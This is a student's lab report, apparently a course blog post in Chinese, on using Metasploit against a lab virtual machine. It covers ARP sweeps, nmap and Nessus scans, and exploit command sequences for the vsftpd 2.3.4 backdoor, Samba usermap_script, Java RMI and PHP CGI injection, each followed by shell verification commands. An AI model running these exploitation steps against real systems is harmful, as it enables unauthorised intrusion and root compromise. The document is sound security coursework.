20232313 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容


基本实验内容如下:

  • 掌握metasploit的用法

2.实验过程

总共5个任务,如下:
(1)进行对靶机的前期渗透;
(2)利用Vsftpd源码包后门漏洞(21端口);
(3)利用SambaMS-RPC Shell命令注入漏洞(端口139);
(4)利用Java RMI SERVER命令执行漏洞(1099端口);
(5)利用PHP CGI参数执行注入漏洞(80端口);

我们一个一个来看。

提前得知主机的ip是192.168.126.146.
d29b62d32b167117729d0b40a03e98ba

(1)进行对靶机的前期渗透

(1.1) 主机发现

我们可以使用msf的arp_sweep工具。
输入sudo msfconsole以root权限进入控制台,输入search arp_sweepuse 0
然后设置扫描的ip网段:set RHOST 192.168.126.0/24,后输入run执行:
4df1f50f9e7bc48e50c2c13a7e6fec00
可以看到靶机在线并且给出了其网卡标识为VMWare,Inc.,证明这就是一台VMWare虚拟机。

(1.2) 端口扫描

在我的kali机上输入nmap -sS -sV 192.168.126.146,-sS是TCP半开放扫描,-sV是服务器版本探测,结果如下:
940c8b82ca25e098ffd8e9eaa840868d
可以看到图上有很多开放的端口。

(1.3) 使用Nessus进行漏洞扫描

输入sudo systemctl start nessusd启动nessus服务,然后进入https://localhost:8834使用。
扫描结果如下图:
13a3656825ad44c327878c81c06c7003

(1.4) 查看系统版本

在win11主机使用nmap -O 192.168.126.146,结果如下:
可以看到系统内核版本以及开放端口。
af33e85eaaf1363e34dd59158ace94ed

(2)利用Vsftpd源码包后门漏洞(21端口)

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.126.146
exploit

验证代码:
whoami
uname -a
pwd
id

结果如下,能够获取root的shell:
cb53ec7345c15effa9d74bf743c17f6a

(3)利用SambaMS-RPC Shell命令注入漏洞(端口139)

msfconsole
use exploit/multi/samba/usermap_script
set RHOST 192.168.126.146
exploit

验证代码:
whoami
uname -a
pwd
id

结果如下,能够获取root的shell:
62f25bdc9bbe5f52d280c08e17c0464e

(4)利用Java RMI SERVER命令执行漏洞(1099端口)

msfconsole
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.126.146
exploit

验证代码:
whoami
uname -a
pwd
id

结果如下,能够获取root的shell:
25e241cb084c8cea0f6f44025267bc85

(5)利用PHP CGI参数执行注入漏洞(80端口)

msfconsole
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.126.146
exploit

验证代码:
whoami
uname -a
pwd
id

这个时候我们获取了shell,但是不是root用户,如下:
e432d58fba8f45663cbe9e1959dc0f1b

3.问题及解决方案

  • 问题:我使用我的一台kali发现无法ping通靶机,但是我的win11主机可以Ping通。
  • 解决方法:
    使用我的kali克隆机即可。

4.学习感悟

前人栽树后人乘凉。我们需要及时借鉴前人的智慧。

参考资料

posted @ 2025-11-17 14:13  20232313-吴至远  阅读(15)  评论(0)    收藏  举报